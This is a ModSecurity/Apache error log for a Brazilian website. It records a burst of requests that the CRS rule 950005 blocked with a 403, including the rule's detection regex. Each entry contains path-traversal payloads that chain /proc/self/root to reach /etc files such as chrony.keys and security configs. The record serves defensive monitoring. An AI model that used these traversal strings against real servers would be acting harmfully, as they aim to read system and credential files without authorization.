[Tue Mar 17 09:31:19.434660 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.241.46:38718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJl-82sZHvlq4xgHrCaAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:20.539041 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.243.203:36054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJmNCmCSWTlPouqorL7gAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:22.887456 2026] [:error] [pid 1210:tid 140411632822016] [client 74.7.243.203:36062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJmlKJy4A1bGlmj9BVrQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:24.221662 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:36072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJnAeiSKl8TjouI-YCPgAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:24.964339 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:33900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJnNCmCSWTlPouqorL8wAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:25.428834 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.243.203:36074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJnZDEJR9VXonE_-1O8wAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:26.261457 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.46:33912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJnqBJNF7axNlVR0X8bwAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:26.741637 2026] [:error] [pid 2553:tid 140411733534464] [client 74.7.243.203:36090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJnv0Bec_B9OkZP_i9EAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:27.529873 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.46:33920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJn6BJNF7axNlVR0X8cQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:28.035724 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:36104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJoJqmL8PQht4WJFlH2wAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:29.315064 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:36116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJoZqmL8PQht4WJFlH3gAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:30.618269 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.243.203:54704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJopDEJR9VXonE_-1O9AAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:31.952969 2026] [:error] [pid 1731:tid 140411565680384] [client 74.7.243.203:54714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJowb2qCuy5irgBMjJLAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:32.200270 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.241.46:46092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJpJqmL8PQht4WJFlH4wAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:33.443136 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.241.46:46100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJpVKJy4A1bGlmj9BVsAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:34.326218 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.243.203:54730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJpv0Bec_B9OkZP_i9FAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:34.783651 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.241.46:46104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJpgb2qCuy5irgBMjJLQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:37.882611 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.243.203:54746] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJqQb2qCuy5irgBMjJLwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:39.170647 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.243.203:54748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJq5DEJR9VXonE_-1O-AAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:41.410070 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:46112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJrNCmCSWTlPouqorL-AAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:41.411264 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.243.203:51082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJrJDEJR9VXonE_-1O-gAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:42.799278 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:51086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJru82sZHvlq4xgHrCcAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
